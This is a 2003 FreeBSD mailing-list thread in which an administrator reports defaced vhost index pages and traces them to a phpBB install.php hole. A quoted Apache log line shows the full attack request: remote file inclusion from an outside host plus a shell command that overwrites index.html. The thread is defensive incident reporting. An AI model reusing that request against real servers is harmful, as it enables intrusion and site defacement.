Hi ! Today I have noticed some modified index.html files on some of our vhosts. Is it Apache related ? Does anyone know about this ? The content is following: IR4DEX ownz you FreeBSD - contato: ir4dex@hotmail.com -Miha
Hi ! It is phpBB related. I found in logs: 200.211.35.130 - - [07/Nov/2003:11:27:01 +0100] "GET /forum/install.php?phpbb_root_dir=http://www.creatividade.hpg.com.br/&cmd=cd%20..;cd%20..;cd%20www.site- name.si;echo%20IR4DEX%20ownz%20you%20FreeBSD%20-%20contato:%20ir4dex@hotmail.com%20>%20index.html HTTP/1.1" 200 904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" I just did chmod 000 `find -name 'install.php'` for a workaround. Apache is latest: Nov 3 18:08 apache+mod_ssl-1.3.28+2.8.15_2 . -Miha On Fri, 7 Nov 2003, Marco Trentini wrote:> Date: Fri, 07 Nov 2003 13:08:26 +0100 > From: Marco Trentini <mark@remotelab.org> > To: Miha Nedok <mike@voyager.unix-systems.net> > Cc: security@freebsd.org, stable@freebsd.org > Subject: Re: hack ? - urgent > > Miha Nedok wrote: > > Hi ! > > > > Today I have noticed some modified index.html files on some of our vhosts. > > Is it Apache related ? Does anyone know about this ? > > > > The content is following: > > IR4DEX ownz you FreeBSD - contato: ir4dex@hotmail.com > > Is your apache version update? > > Maybe IR4DEX knows more about it :) > > -- > Marco Trentini mark@remotelab.org > http://www.remotelab.org/ >
Miha Nedok wrote:> Hi ! > > Today I have noticed some modified index.html files on some of our vhosts. > Is it Apache related ? Does anyone know about this ? > > The content is following: > IR4DEX ownz you FreeBSD - contato: ir4dex@hotmail.comIs your apache version update? Maybe IR4DEX knows more about it :) -- Marco Trentini mark@remotelab.org http://www.remotelab.org/ _______________________________________________ freebsd-stable@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-stable To unsubscribe, send any mail to "freebsd-stable-unsubscribe@freebsd.org"
Dude, you got defaced probably or someone from the inside has a great sence of humour :-P>From: Marco Trentini <mark@remotelab.org> >Reply-To: mark@remotelab.org >To: Miha Nedok <mike@voyager.unix-systems.net> >CC: stable@freebsd.org, security@freebsd.org >Subject: Re: hack ? - urgent >Date: Fri, 07 Nov 2003 13:08:26 +0100 > >Miha Nedok wrote: >>Hi ! >> >>Today I have noticed some modified index.html files on some of our vhosts. >>Is it Apache related ? Does anyone know about this ? >> >>The content is following: >>IR4DEX ownz you FreeBSD - contato: ir4dex@hotmail.com > >Is your apache version update? > >Maybe IR4DEX knows more about it :) > >-- >Marco Trentini mark@remotelab.org >http://www.remotelab.org/ > >_______________________________________________ >freebsd-security@freebsd.org mailing list >http://lists.freebsd.org/mailman/listinfo/freebsd-security >To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"_________________________________________________________________ The new MSN 8: advanced junk mail protection and 2 months FREE* http://join.msn.com/?page=features/junkmail _______________________________________________ freebsd-stable@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-stable To unsubscribe, send any mail to "freebsd-stable-unsubscribe@freebsd.org"